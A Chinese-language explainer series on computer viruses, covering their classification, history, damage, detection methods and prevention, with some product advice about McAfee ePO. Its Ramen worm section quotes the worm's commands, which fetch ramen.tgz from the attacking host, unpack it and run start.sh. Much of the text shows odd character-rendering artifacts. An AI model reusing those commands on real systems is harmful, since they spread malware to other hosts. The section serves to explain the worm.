計算機病毒分類
根據(jù)多年對計算機病毒的研究,按照科學的,系統(tǒng)的,嚴密的方法,計算機病毒可分類如下:
按照計算機病毒屬性的分類
1、病毒存在的媒體
根據(jù)病毒存在的媒體,病毒可以劃分為網(wǎng)絡病毒,文件病毒,引導型病毒。
網(wǎng)絡病毒通過計算機網(wǎng)絡傳播感染網(wǎng)絡中的可執(zhí)行文件,文件病毒感染計算機中的文件,引導型病毒感染啟動扇區(qū)和硬盤的系統(tǒng)引導扇區(qū),還有這三種情況的混合型,例如:多型病毒感染文件和引導扇區(qū)兩種目標,這樣的病毒通常都具有復雜的算法,它們使用非常規(guī)的辦法侵入系統(tǒng),同時使用了加密和變形算法。
2、病毒傳染的方法
3、病毒破壞的能力
根據(jù)病毒破壞的能力可劃分為以下幾種:
無害型:除了傳染時減少磁盤的可用空間外,對系統(tǒng)沒有其它影響。
無危險型:這類病毒僅僅是減少內(nèi)存、顯示圖像、發(fā)出聲音及同類音響。
危險型:這類病毒在計算機系統(tǒng)操作中造成嚴重的錯誤。
非常危險型:這類病毒刪除程序、破壞數(shù)據(jù)、清除系統(tǒng)內(nèi)存區(qū)和操作系統(tǒng)中重要的信息。
這些病毒對系統(tǒng)造成的危害,并不是本身的算法中存在危險的調(diào)用,而是當它們傳染時會引起無法預料的和災難性的破壞。由病毒引起其它的程序產(chǎn)生的錯誤也會破壞文件和扇區(qū),這些病毒也按照他們引起的破壞能力劃分。一些現(xiàn)在的無害型病毒也可能會對新版的DOS、Windows和其它操作系統(tǒng)造成破壞。例如:在早期的病毒中,有一個Denzuk病毒在360K磁盤上很好的工作,不會造成任何破壞,但是在后來的高密度軟盤上卻能引起大量的數(shù)據(jù)丟失。
4、病毒特有的算法
根據(jù)病毒特有的算法,病毒可以劃分為:
伴隨型病毒:這一類病毒并不改變文件本身,它們根據(jù)算法產(chǎn)生EXE文件的伴隨體,具有同樣的名字和不同的擴展名,例如:XCOPY.EXE的伴隨體是XCOPY.COM。病毒把自身寫入COM文件并不改變EXE文件,當DOS加載文件時,伴隨體優(yōu)先被執(zhí)行到,再由伴隨體加載執(zhí)行原來的EXE文件。
蠕蟲型病毒:通過計算機網(wǎng)絡傳播,不改變文件和資料信息,利用網(wǎng)絡從一臺機器的內(nèi)存?zhèn)鞑サ狡渌鼨C器的內(nèi)存,計算網(wǎng)絡地址,將自身的病毒通過網(wǎng)絡發(fā)送。有時它們在系統(tǒng)存在,一般除了內(nèi)存不占用其它資源。
寄生型病毒:除了伴隨和蠕蟲型,其它病毒均可稱為寄生型病毒,它們依附在系統(tǒng)的引導扇區(qū)或文件中,通過系統(tǒng)的功能進行傳播,按算法分為:
練習型病毒:病毒自身包含錯誤,不能進行很好的傳播,例如一些病毒在調(diào)試階段。
詭秘型病毒:它們一般不直接修改DOS中斷和扇區(qū)數(shù)據(jù),而是通過設備技術和文件緩沖區(qū)等DOS內(nèi)部修改,不易看到資源,使用比較高級的技術。利用DOS空閑的數(shù)據(jù)區(qū)進行工作。
變型病毒:這一類病毒使用一個復雜的算法,使自己每傳播一份都具有不同的內(nèi)容和長度。它們一般的作法是一段混有無關指令的解碼算法和被變化過的病毒體組成。
計算機病毒小知識速查系列三
計算機病毒的發(fā)展
在病毒的發(fā)展史上,病毒的出現(xiàn)是有規(guī)律的,一般情況下一種新的病毒技術出現(xiàn)后,病毒迅速發(fā)展,接著反病毒技術的發(fā)展會抑制其流傳。操作系統(tǒng)進行升級時,病毒也會調(diào)整為新的方式,產(chǎn)生新的病毒技術。它可劃分為:
1、DOS引導階段
1987年,計算機病毒主要是引導型病毒,具有代表性的是小球和石頭病毒。
當時得計算機硬件較少,功能簡單,一般需要通過軟盤啟動后使用。引導型病毒利用軟盤得啟動原理工作,它們修改系統(tǒng)啟動扇區(qū),在計算機啟動時首先取得控制權,減少系統(tǒng)內(nèi)存,修改磁盤讀寫中斷,影響系統(tǒng)工作效率,在系統(tǒng)存取磁盤時進行傳播。1989年,引導型病毒發(fā)展為可以感染硬盤,典型的代表有石頭2。
2、DOS可執(zhí)行階段
1989年,可執(zhí)行文件型病毒出現(xiàn),它們利用DOS系統(tǒng)加載執(zhí)行文件的機制工作,代表為耶路撒冷,星期天病毒,病毒代碼在系統(tǒng)執(zhí)行文件時取得控制權,修改DOS中斷,在系統(tǒng)調(diào)用時進行傳染,并將自己附加在可執(zhí)行文件中,使文件長度增加。1990年,發(fā)展為復合型病毒,可感染COM和EXE文件。
3、伴隨、批次型階段
1992年,伴隨型病毒出現(xiàn),它們利用DOS加載文件的優(yōu)先順序進行工作。具有代表性的是金蟬病毒,它感染EXE文件時生成一個和EXE同名的擴展名為COM伴隨體;它感染COM文件時,改為原來的COM文件為同名的EXE文件,在產(chǎn)生一個原名的伴隨體,文件擴展名為COM。這樣,在DOS加載文件時,病毒就取得控制權。這類病毒的特點是不改變原來的文件內(nèi)容,日期及屬性,解除病毒時只要將其伴隨體刪除即可。在非DOS操作系統(tǒng)中,一些伴隨型病毒利用操作系統(tǒng)的描述語言進行工作,具有典型代表的是海盜旗病毒,它在得到執(zhí)行時,詢問用戶名稱和口令,然后返回一個出錯信息,將自身刪除。批次型病毒是工作在DOS下的和海盜旗病毒類似的一類病毒。
4、幽靈、多形階段
1994年,隨著匯編語言的發(fā)展,實現(xiàn)同一功能可以用不同的方式進行完成,這些方式的組合使一段看似隨機的代碼產(chǎn)生相同的運算結果。幽靈病毒就是利用這個特點,每感染一次就產(chǎn)生不同的代碼。例如一半病毒就是產(chǎn)生一段有上億種可能的解碼運算程序,病毒體被隱藏在解碼前的數(shù)據(jù)中,查解這類病毒就必須能對這段數(shù)據(jù)進行解碼,加大了查毒的難度。多形型病毒是一種綜合性病毒,它既能感染引導區(qū)又能感染程序區(qū),多數(shù)具有解碼算法,一種病毒往往要兩段以上的子程序方能解除。
5、生成器、變體機階段
1995年,在匯編語言中,一些數(shù)據(jù)的運算放在不同的通用寄存器中,可運算出同樣的結果,隨機的插入一些空操作和無關指令,也不影響運算的結果,這樣,一段解碼算法就可以由生成器生成。當生成的是病毒時,這種復雜的稱之為病毒生成器和變體機就產(chǎn)生了。具有典型代表的是病毒制造機VCL,它可以在瞬間制造出成千上萬種不同的病毒,查解時就不能使用傳統(tǒng)的特征識別法,需要在宏觀上分析指令,解碼后查解病毒。變體機就是增加解碼復雜程度的指令生成機制。
6、網(wǎng)絡、蠕蟲階段
1995年,隨著網(wǎng)絡的普及,病毒開始利用網(wǎng)絡進行傳播,它們只是以上幾代病毒的改進。在非DOS操作系統(tǒng)中,蠕蟲是典型的代表,它不占用除內(nèi)存以外的任何資源,不修改磁盤文件,利用網(wǎng)絡功能搜索網(wǎng)絡地址,將自身向下一地址進行傳播,有時也在網(wǎng)絡服務器和啟動文件中存在。
7、視窗階段
1996年,隨著Windows和Windows95的日益普及,利用Windows進行工作的病毒開始發(fā)展,它們修改文件,典型的代表是DS.3873,這類病毒的急智更為復雜,它們利用保護模式和API調(diào)用接口工作,解除方法也比較復雜。
8、宏病毒階段
1996年,隨著WindowsWord功能的增強,使用Word宏語言也可以編制病毒,這種病毒使用類Basic語言,編寫輕易,感染W(wǎng)ord文檔文件。在Excel和AmiPro出現(xiàn)的相同工作機制的病毒也歸為此類。由于Word文檔格式?jīng)]有公開,這類病毒查解比較困難。
9、互連網(wǎng)階段
1997年,隨著因特網(wǎng)的發(fā)展,各種病毒也開始利用因特網(wǎng)進行傳播,一些攜帶病毒的數(shù)據(jù)包和郵件越來越多,假如不小心打開了這些郵件,機器就有可能中毒。
10Java、郵件炸彈階段
1997年,隨著萬維網(wǎng)上Java的普及,利用Java語言進行傳播和資料獲取的病毒開始出現(xiàn),典型的代表是JavaSnake病毒。還有一些利用郵件服務器進行傳播和破壞的病毒,例如Mail-Bomb病毒,它就嚴重影響因特網(wǎng)的效率。
計算機病毒小知識速查系列四
計算機病毒的危害性
1988年11月2日下午5時1分59秒,美國康奈爾大學的計算機科學系研究生,23歲的莫里斯將其編寫的蠕蟲程序輸入計算機網(wǎng)絡。在幾小時內(nèi)導致因特網(wǎng)堵塞。這個網(wǎng)絡連接著大學、研究機關的155000臺計算機,使網(wǎng)絡堵塞,運行遲緩。這件事就像是計算機界的一次大地震,引起了巨大反響,震動全世界,引起了人們對計算機病毒的恐慌,也使更多的計算機專家重視和致力于計算機病毒研究。1988年下半年,我國在統(tǒng)計局系統(tǒng)首次發(fā)現(xiàn)了小球病毒,它對統(tǒng)計系統(tǒng)影響極大。最近的CIH病毒,漂亮殺病毒等等都在全世界范圍內(nèi)造成了很大的經(jīng)濟和社會損失。
可以看到,隨著計算機和因特網(wǎng)的日益普及,計算機病毒和崩潰,重要數(shù)據(jù)遭到破壞和丟失,會造成社會財富的巨大浪費,甚至會造成全人類的災難。
國內(nèi)外防毒行業(yè)發(fā)展
隨著計算機技術發(fā)展得越來越快,使得計算機病毒技術與計算機反病毒技術的對抗也越來越尖銳。據(jù)統(tǒng)計,現(xiàn)在基本上天天都要出現(xiàn)幾十種新病毒,其中很多病毒的破壞性都非常大,稍有不慎,就會給計算機用戶造成嚴重后果。下面我們以介紹國內(nèi)防毒行業(yè)的發(fā)展為主。
我國計算機反病毒技術的研究和發(fā)展,是從研制防病毒卡開始的。防病毒卡的核心實際上是一個軟件,只不過將其固化在ROM中。它的出發(fā)點是想以不變應萬變,通過動態(tài)駐留內(nèi)存來監(jiān)視計算機的運行情況,根據(jù)總結出來的病毒行為規(guī)則和經(jīng)驗來判定是否有病毒活動,通過截獲中斷控制權規(guī)則和經(jīng)驗來判定是否有病毒活動,并可以截獲中斷控制權來使內(nèi)存中的病毒癱瘓,使其失去傳染別的文件和破壞信息資料的能力,這就是防病毒卡帶毒運行功能的基本原理。防病毒卡主要的不足是與正常軟件非凡是國產(chǎn)的軟件有不兼容的現(xiàn)象,誤報、漏報病毒現(xiàn)象時有發(fā)生,降低了計算機運行速度,升級困難等。從防病毒技術上說是不成熟的,病毒知變?nèi)f化,技術手段越來越高,企圖以一種不變的技術對付病毒是不可能的。防病毒卡的動態(tài)監(jiān)測技術、病毒行為規(guī)則的研究,對于發(fā)現(xiàn)計算機病毒起了很大的作用,這些技術是防病毒卡換精華。但是作為一個產(chǎn)品,只有這部分技術是遠遠不夠的,這部分技術也沒有太大的實際意義,所以防病毒卡的使用者在減少。
隨著防病毒卡的衰落,解病毒軟件則日益風行。解病毒軟件最重要的功能是將病毒徹底干凈地予以清除,假如說防病毒卡是治標的話,那么解病毒軟件則是治本。
第一代反病毒技術是采取單純的病毒特征判定,將病毒從帶毒文件中清除掉。這種方式可以準確地清除病毒,可靠性很高。后來病毒技術發(fā)展了,非凡是加密和變形技術的運用,使得這種簡單的靜態(tài)掃描方式失去了作用。隨之而來的反病毒技術也發(fā)展了一步。
第二代反病毒技術是采用靜態(tài)廣譜特征掃描方法檢測病毒,這種方式可以更多地檢測出變形病毒,但另一方面誤報率也提高,尤其是用這種不嚴格的特征判定方式去清除病毒帶來的風險性很大,輕易造成文件和數(shù)據(jù)的破壞。所以說靜態(tài)防病毒技術也有難以克服的缺陷。
第三代反病毒技術的主要特點是將靜態(tài)掃描技術和動態(tài)仿真跟蹤技術結合起來,將查找病毒和清除病毒合二為一,形成一個整體解決方案,能夠全面實現(xiàn)防、查、消等反病毒所必備的各種手段,以駐留內(nèi)存方式防止病毒的入侵,凡是檢測到的病毒都能清除,不會破壞文件和數(shù)據(jù)。隨著病毒數(shù)量的增加和新型病毒技術的發(fā)展,靜態(tài)掃描技術將會使查毒軟件速度降低,駐留內(nèi)存防毒模塊輕易產(chǎn)生誤報。
第四代反病毒技術則是針對計算機病毒的發(fā)展而基于病毒家族體系的命名規(guī)則、基于多位CRC校驗和掃描機理,啟發(fā)式智能代碼分析模塊、動態(tài)數(shù)據(jù)還原模塊、內(nèi)存解毒模塊、自身免疫模塊等先進的解毒技術,較好的解決了以前防毒技術顧此失彼、此消彼長的狀態(tài)。
計算機病毒小知識速查系列五
病毒檢測的方法
在與病毒的對抗中,及早發(fā)現(xiàn)病毒很重要。早發(fā)現(xiàn),早處置,可以減少損失。檢測病毒方法有:特征代碼法、校驗和法、行為監(jiān)測法、軟件模擬法,這些方法依據(jù)的原理不同,實現(xiàn)時所需開銷不同,檢測范圍不同,各有所長。
特征代碼法
特征代碼法被早期應用于SCAN、CPAV等聞名病毒檢測工具中。國外專家認為特征代碼法是檢測已知病毒的最簡單、開銷最小的方法。
特征代碼法的實現(xiàn)步驟如下:
采集已知病毒樣本,病毒假如既感染COM文件,又感染EXE文件,對這種病毒要同時采集COM型病毒樣本和EXE型病毒樣本。
在病毒樣本中,抽取特征代碼。依據(jù)如下原則:
抽取的代碼比較非凡,不大可能與普通正常程序代碼吻合。抽取的代碼要有適當長度,一方面維持特征代碼的唯一性,另一方面又不要有太大的空間與時間的開銷。假如一種病毒的特征代碼增長一字節(jié),要檢測3000種病毒,增加的空間就是3000字節(jié)。在保持唯一性的前提下,盡量使特征代碼長度短些,以減少空間與時間開銷。
在既感染COM文件又感染EXE文件的病毒樣本中,要抽取兩種樣本共有的代碼。將特征代碼納入病毒數(shù)據(jù)庫。
打開被檢測文件,在文件中搜索,檢查文件中是否含有病毒數(shù)據(jù)庫中的病毒特征代碼。假如發(fā)現(xiàn)病毒特征代碼,由于特征代碼與病毒一一對應,便可以斷定,被查文件中患有何種病毒。
采用病毒特征代碼法的檢測工具,面對不斷出現(xiàn)的新病毒,必須不斷更新版本,否則檢測工具便會老化,逐漸失去實用價值。病毒特征代碼法對從未見過的新病毒,自然無法知道其特征代碼,因而無法去檢測這些新病毒。
特征代碼法的優(yōu)點是:檢測準確快速、可識別病毒的名稱、誤報警率低、依據(jù)檢測結果,可做解毒處理。其缺點是:不能檢測未知病毒、搜集已知病毒的特征代碼,費用開銷大、在網(wǎng)絡上效率低。
其特點:
A.速度慢。隨著病毒種類的增多,檢索時間變長。假如檢索5000種病毒,必須對5000個病毒特征代碼逐一檢查。假如病毒種數(shù)再增加,檢病毒的時間開銷就變得十分可觀。此類工具檢測的高速性,將變得日益困難。
B.誤報警率低。
非C.不能檢查多形性病毒。特征代碼法是不可能檢測多態(tài)性病毒的。國外專家認為多態(tài)性病毒是病毒特征代碼法的索命者。
D.不能對付隱蔽性病毒。隱蔽性病毒假如先進駐內(nèi)存,后運行病毒檢測工具,隱蔽性病毒能先于檢測工具,將被查文件中的病毒代碼剝?nèi)ィ瑱z測工具的確是在檢查一個虛假的好文件,而不能報警,被隱蔽性病毒所蒙騙。
校驗和法
將正常文件的內(nèi)容,計算其校驗和,將該校驗和寫入文件中或?qū)懭雱e的文件中保存。在文件使用過程中,定期地或每次使用文件前,檢查文件現(xiàn)在內(nèi)容算出的校驗和與原來保存的校驗和是否一致,因而可以發(fā)現(xiàn)文件是否感染,這種方法叫校驗和法,它既可發(fā)現(xiàn)已知病毒又可發(fā)現(xiàn)未知病毒。在SCAN和CPAV工具的后期版本中除了病毒特征代碼法之外,還納入校驗和法,以提高其檢測能力。
這種方法既能發(fā)現(xiàn)已知病毒,也能發(fā)現(xiàn)未知病毒,但是,它不能識別病毒類,不能報出病毒名稱。由于病毒感染并非文件內(nèi)容改變的唯一的非他性原因,文件內(nèi)容的改變有可能是正常程序引起的,所以校驗和法經(jīng)常誤報警。而且此種方法也會影響文件的運行速度。
病毒感染的確會引起文件內(nèi)容變化,但是校驗和法對文件內(nèi)容的變化太敏感,又不能區(qū)分正常程序引起的變動,而頻繁報警。用監(jiān)視文件的校驗和來檢測病毒,不是最好的方法。
這種方法碰到下述情況:已有軟件版更新、變更口令、修改運行參數(shù)、校驗和法都會誤報警。
校驗和法對隱蔽性病毒無效。隱蔽性病毒進駐內(nèi)存后,會自動剝?nèi)ト径境绦蛑械牟《敬a,使校驗和法受騙,對一個有毒文件算出正常校驗和。
運用校驗和法查病毒采用三種方式:
①在檢測病毒工具中納入校驗和法,對被查的對象文件計算其正常狀態(tài)的校驗和,將校驗和值寫入被查文件中或檢測工具中,而后進行比較。
②在應用程序中,放入校驗和法自我檢查功能,將文件正常狀態(tài)的校驗和寫入文件本身中,每當應用程序啟動時,比較現(xiàn)行校驗和與原校驗和值。實現(xiàn)應用程序的自檢測。
③將校驗和檢查程序常駐內(nèi)存,每當應用程序開始運行時,自動比較檢查應用程序內(nèi)部或別的文件中預先保存的校驗和。
校驗和法的優(yōu)點是:方法簡單能發(fā)現(xiàn)未知病毒、被查文件的細微變化也能發(fā)現(xiàn)。其缺點是:發(fā)布通行記錄正常態(tài)的校驗和、會誤報警、不能識別病毒名稱、不能對付隱蔽型病毒。
行為監(jiān)測法
利用病毒的特有行為特征性來監(jiān)測病毒的方法,稱為行為監(jiān)測法。通過對病毒多年的觀察、研究,有一些行為是病毒的共同行為,而且比較非凡。在正常程序中,這些行為比較罕見。當程序運行時,監(jiān)視其行為,假如發(fā)現(xiàn)了病毒行為,立即報警。
這些做為監(jiān)測病毒的行為特征如下:
A.占有INT13H
所有的引導型病毒,都攻擊Boot扇區(qū)或主引導扇區(qū)。系統(tǒng)啟動時,當Boot扇區(qū)或主引導扇區(qū)獲得執(zhí)行權時,系統(tǒng)剛剛開工。一般引導型病毒都會占用INT13H功能,因為其他系統(tǒng)功能未設置好,無法利用。引導型病毒占據(jù)INT13H功能,在其中放置病毒所需的代碼。
B.改DOS系統(tǒng)為數(shù)據(jù)區(qū)的內(nèi)存總量
病毒常駐內(nèi)存后,為了防止DOS系統(tǒng)將其覆蓋,必須修改系統(tǒng)內(nèi)存總量。
C.對COM、EXE文件做寫入動作
病毒要感染,必須寫COM、EXE文件。
D.病毒程序與宿主程序的切換
染毒程序運行中,先運行病毒,而后執(zhí)行宿主程序。在兩者切換時,有許多特征行為。
行為監(jiān)測法的優(yōu)點:可發(fā)現(xiàn)未知病毒、可相當準確地預告未知的多數(shù)病毒。行為監(jiān)測法的短處:可能誤報警、不能識別病毒名稱、實現(xiàn)時有一定難度。
軟件模擬法
多態(tài)性病毒每次感染都變化其病毒密碼,對付這種病毒,特征代碼法失效。因為多態(tài)性病毒代碼實施密碼化,而且每次所用密鑰不同,把染毒的病毒代碼相互比較,也無法找出相同的可能做為特征的穩(wěn)定代碼。雖然行為檢測法可以檢測多態(tài)性病毒,但是在檢測出病毒后,因為不知病毒的種類,難于做消毒處理。
計算機病毒小知識速查系列六
計算機病毒的破壞行為
計算機病毒的破壞行為體現(xiàn)了病毒的殺傷能力。病毒破壞行為的激烈程度取決于病毒作者的主觀愿望和他所具有的技術能量。數(shù)以萬計、不斷發(fā)展擴張的病毒,其破壞行為千奇百怪,不可能窮舉其破壞行為,難以做全面的描述。根據(jù)有的病毒資料可以把病毒的破壞目標和攻擊部位歸納如下:
1.攻擊系統(tǒng)數(shù)據(jù)區(qū),攻擊部位包括:
硬盤主引尋扇區(qū)、Boot扇區(qū)、FAT表、文件目錄。一般來說,攻擊系統(tǒng)數(shù)據(jù)區(qū)的病毒是惡性病毒,受損的數(shù)據(jù)不易恢復。
2.攻擊文件
病毒對文件的攻擊方式很多,可列舉如下:刪除、改名、替換內(nèi)容、丟失部分程序代碼、內(nèi)容顛倒、寫入時間空白、變碎片、假冒文件、丟失文件簇、丟失數(shù)據(jù)文件。
3.攻擊內(nèi)存
內(nèi)存是計算機的重要資源,也是病毒的攻擊目標。病毒額外地占用和消耗系統(tǒng)的內(nèi)存資源,可以導致一些大程序受阻。病毒攻擊內(nèi)存的方式如下:占用大量內(nèi)存、改變內(nèi)存總量、禁止分配內(nèi)存、蠶食內(nèi)存。
4.干擾系統(tǒng)運行
病毒會干擾系統(tǒng)的正常運行,以此做為自己的破壞行為。此類行為也是花樣繁多,可以列舉下述諸方式:不執(zhí)行命令、干擾內(nèi)部命令的執(zhí)行、虛假報警、打不開文件、內(nèi)部棧溢出、占用非凡數(shù)據(jù)區(qū)、換現(xiàn)行盤、時鐘倒轉(zhuǎn)、重啟動、死機、強制游戲、擾亂串并行口。
5.速度下降
病毒激活時,其內(nèi)部的時間延遲程序啟動。在時鐘中納入了時間的循環(huán)計數(shù),迫使計算機空轉(zhuǎn),計算機速度明顯下降。
6.攻擊磁盤
攻擊磁盤數(shù)據(jù)、不寫盤、寫操作變讀操作、寫盤時丟字節(jié)。
7.擾亂屏幕顯示
病毒擾亂屏幕顯示的方式很多,可列舉如下:字符跌落、環(huán)繞、倒置、顯示前一屏、光標下跌、滾屏、抖動、亂寫、吃字符。
8.鍵盤
病毒干擾鍵盤操作,已發(fā)現(xiàn)有下述方式:響鈴、封鎖鍵盤、換字、抹掉緩存區(qū)字符、重復、輸入紊亂。
9.喇叭
許多病毒運行時,會使計算機的喇叭發(fā)出響聲。有的病毒作者讓病毒演奏旋律美麗的世界名曲,在高雅的曲調(diào)中去殺戮人們的信息財富。有的病毒作者通過喇叭發(fā)出種種聲音。已發(fā)現(xiàn)的有以下方式:演奏曲子、警笛聲、炸彈噪聲、鳴叫、咔咔聲、嘀嗒聲
10.攻擊CMOS
在機器的CMOS區(qū)中,保存著系統(tǒng)的重要數(shù)據(jù)。例如系統(tǒng)時鐘、磁盤類型、內(nèi)存容量等,并具有校驗和。有的病毒激活時,能夠?qū)MOS區(qū)進行寫入動作,破壞系統(tǒng)CMOS中的數(shù)據(jù)。
11.干擾打印機
假報警、間斷性打印、更換字符。
計算機病毒小知識速查系列七
計算機病毒的防治策略
計算機病毒的防治要從防毒、查毒、解毒三方面來進行;系統(tǒng)對于計算機病毒的實際防治能力和效果也要從防毒能力、查毒能力和解毒能力三方面來評判。
防毒是指根據(jù)系統(tǒng)特性,采取相應的系統(tǒng)安全措施預防病毒侵入計算機。查毒是指對于確定的環(huán)境,能夠準確地報出病毒名稱,該環(huán)境包括,內(nèi)存、文件、引導區(qū)、網(wǎng)絡等。解毒是指根據(jù)不同類型病毒對感染對象的修改,并按照病毒的感染特性所進行的恢復。該恢復過程不能破壞未被病毒修改的內(nèi)容。感染對象包括:內(nèi)存、引導區(qū)、可執(zhí)行文件、文檔文件、網(wǎng)絡等。
防毒能力是指預防病毒侵入計算機系統(tǒng)的能力。通過采取防毒措施,應可以準確地、實時地監(jiān)測預警經(jīng)由光盤、軟盤、硬盤不同目錄之間、局域網(wǎng)、因特網(wǎng)或其它形式的文件下載等多種方式進行的傳輸;能夠在病毒侵入系統(tǒng)是發(fā)出警報,記錄攜帶病毒的文件,即時清除其中的病毒;對網(wǎng)絡而言,能夠向網(wǎng)絡治理員發(fā)送關于病毒入侵的信息,記錄病毒入侵的工作站,必要時還要能夠注銷工作站,隔離病毒源。
查毒能力是指發(fā)現(xiàn)和追蹤病毒來源的能力。通過查毒應該能準確地發(fā)現(xiàn)計算機系統(tǒng)是否感染有病毒,并準確查找出病毒的來源,并能給出統(tǒng)計報告;查解病毒的能力應由查毒率和誤報率來評判。
解毒能力是指從感染對象中清除病毒,恢復被病毒感染前的原始信息的能力;解毒能力應用解毒率來評判。
計算機病毒小知識速查系列八
Ramen是Linux的“病”而非“毒”
前一段時間,一些媒體報告:“世界上第一個Linux病毒Reman已經(jīng)出現(xiàn)”。這引起我極大的愛好,并想一睹Reman的廬山真面目。但是,當我得到該病毒的有關資料和樣本之后發(fā)現(xiàn):Reman并不能嚴格地稱為病毒,它實際上只是一個古老的、在Unix/Linux世界早已存在的“緩沖區(qū)溢出”攻擊程序。幾乎所有Unix/Linux版本中都或多或少地存在這樣的問題。第一次此種類型的攻擊是在十多年前,Reman這種“緩沖區(qū)溢出”攻擊程序并不是在今天的世界第一次出現(xiàn)。事實上,針對Windows98/NT的緩沖區(qū)溢出攻擊也是很常見的,且并不被稱為病毒。
緩沖區(qū)溢出的原理是:向一個有限空間的緩沖區(qū)拷貝了過長的字符串,覆蓋相鄰的存儲單元,從而引起程序運行失敗。因為自動變量保存在堆棧當中,當發(fā)生緩沖區(qū)溢出的時候,存儲在堆棧中的函數(shù)返回地址也會被覆蓋,從而無法從發(fā)生溢出的函數(shù)正常返回。在這樣的情況下,系統(tǒng)一般報告:“coredump”或“segmentfault”。嚴重的情況是:假如覆蓋緩沖區(qū)的是一段精心設計的機器指令序列,它可能通過溢出,改變返回地址,將其指向自己的指令序列,從而改變該程序的正常流程。這段精心設計的指令一般的目的是:“/bin/sh”,所以這段代碼被稱為“shellcode”。通過這樣的溢出可以得到一個shell,僅此而已。但是,假如被溢出是一個suidroot程序,得到的將是一個rootshell。這樣,機器的控制權已經(jīng)易手,此后發(fā)生的任何事情都是合理的。
下面我們回到Reman。它首先對網(wǎng)絡上的主機進行掃描,通過兩個普通的漏洞進入系統(tǒng),獲取root權限,然后從源主機復制自身,以繼續(xù)掃描網(wǎng)上其他服務器。對于RedHat6.2來講,假如攻擊成功,它會做以下工作:
mkdir/usr/src/.poop;cd/usr/src/.poop
exportTERM=vt100
lynx-sourcehttp://FROMADDR:27374/usr/src/.poop/ramen.tgz
cpramen。tgz/tmp
gzip-dramen.tgz;tar-xvframen。tar;./start.sh
echoEatYourRamen!
mail-sTOADDR-cgb31337@hotmail.comgb31337@yahoo.com
很明顯,Reman只是一個自動化了的緩沖區(qū)溢出程序,而且是很普通的一種。目前緩沖區(qū)溢出攻擊是非常普遍的一種攻擊。黑客網(wǎng)站對各類系統(tǒng)的漏洞的發(fā)布幾乎每日更新。這種攻擊方式并不是不可避免,目前已有很多對付該類攻擊的方案。需要指出的是:Reman這樣的攻擊程序?qū)t旗Linux的攻擊是不可能成功的,因為紅旗Linux全線產(chǎn)品都考慮了“緩沖區(qū)溢出”這樣的安全問題。
計算機病毒小知識速查系列九
專家談計算機病毒高發(fā)季節(jié)的防護
4月是計算機病毒的高發(fā)季節(jié)。通過網(wǎng)絡新途徑,病毒早已突破了地域界限,飛速傳播,預計本月有至少20余種電腦病毒將向我們的電腦發(fā)起猛攻,其中尤以4月26日的CIH病毒最為險惡。
八大“前兆”
“計算機‘發(fā)病’也有預兆,及早注重完全可以避免?!鄙虾J行畔⑥k信息安全專家石堅提醒市民注重以下八大“前兆”:計算機經(jīng)常性出現(xiàn)無緣無故的死機;計算機系統(tǒng)無法正常啟動或啟動變慢;鍵盤、顯示有異?,F(xiàn)象;運行速度明顯變慢;以前能正常運行的軟件經(jīng)常發(fā)生內(nèi)存不足的錯誤;文件的長度、內(nèi)容、屬性和日期等無故改變;經(jīng)常丟失文件、丟失數(shù)據(jù);自動鏈接到一些生疏網(wǎng)站?!爱敵霈F(xiàn)上述情況時,說明您的計算機很可能已經(jīng)感染了病毒。”“臨床”病征石堅還列出了病毒發(fā)作時的病癥:如“胡言亂語”——提示一些不相干的話,發(fā)出一段音樂,產(chǎn)生特定的圖像,硬盤燈不斷閃爍;“胡攪蠻纏”——忽然進行游戲算法,鼠標自己在動,Windows桌面圖標亂動,系統(tǒng)自動發(fā)送電子郵件?!安∏椤眹乐貢r計算機還會忽然死機或重新啟動。
預防“接種”
市計算機病毒防范服務中心82000熱線的專家專為電腦用戶開出了春季預防“藥方”,共計8味“良藥”:個人計算機乃至整個網(wǎng)絡都應安裝實時防病毒軟件,以建立完整的網(wǎng)絡防毒架構;及時更新殺毒軟件;不要打開任何附件后綴為VBS、CHM、PIF、SCR、SHS的文件,對附件后綴為EXE與COM的文件應先確認再打開;來歷不明的郵件最好刪除或先用防病毒軟件檢查;不要隱藏系統(tǒng)中已知文件類型的擴展名;所有主題有“FW:”的信件都要提高警惕;重要資料應作好備份;用戶應使用最新版的OutlookExpress安全修補程序或?qū)g覽器設成最高安全性。專家還歡迎市民帶著問題參加本周六在上海圖書館知識廣場舉行的大型咨詢活動。
計算機病毒小知識速查系列十
及時升級反病毒軟件的利器
目前有許多電腦病毒發(fā)作特點不是快速而猛烈的,而是緩慢而狡猾的,有時還具有使用加密插件自動升級的能力,反病毒專家認為這些發(fā)作緩慢的病毒有非同平常的駐留本領,一旦發(fā)作將對計算機更加危險。正是由于病毒的日益增多,因此反病毒軟件也得到了大家的歡迎。但現(xiàn)在的病毒能夠自動地不斷升級,這就要求我們必須及時地對反病毒軟件進行升級發(fā)展,只有這樣才能使計算機更加安全地使用。但對反病毒軟件進行升級也不是一件很輕易的事情,除了要確保它的時效性外,我們還必須考慮到完成該工作所要的時間,以及由此帶來的潛在的危險等因素,因為一點點的時間誤差就可能給自己的計算機造成難以彌補的損失。那么我們該如何才能及時準確地升級反病毒軟件呢?下面筆者就以McAfee系列的反病毒軟件為例,和大家談談使用McAfee的ePo策略來在工作中及時完成對反病毒軟件的升級工作。
McAfeeePo是英文McAfeeePolicyOrchestrator的縮寫,它是一個與McAfee反病毒軟件結合比較緊密的綜合型治理工具,該工具一般具有智能組織用戶、策略的實時變化、增強的報告、安全的策略治理以及無縫升級反病毒軟件等特征,它可以幫助我們及時完成反病毒軟件的分配工作,該項功能可以使我們這些普通的網(wǎng)民省卻了購買或?qū)ふ业谌杰浖穆闊?,同樣也會降低工作中可能存在的安裝和升級的復雜性,更重要的一點就是ePo還可以與市面上流行的第三方軟件分配工具進行高效協(xié)調(diào)地工作,另外ePo還能夠監(jiān)控并且改變用戶機器的配置,獲得狀態(tài)和事件的增強報告,追蹤病毒感染率和糾正行動。
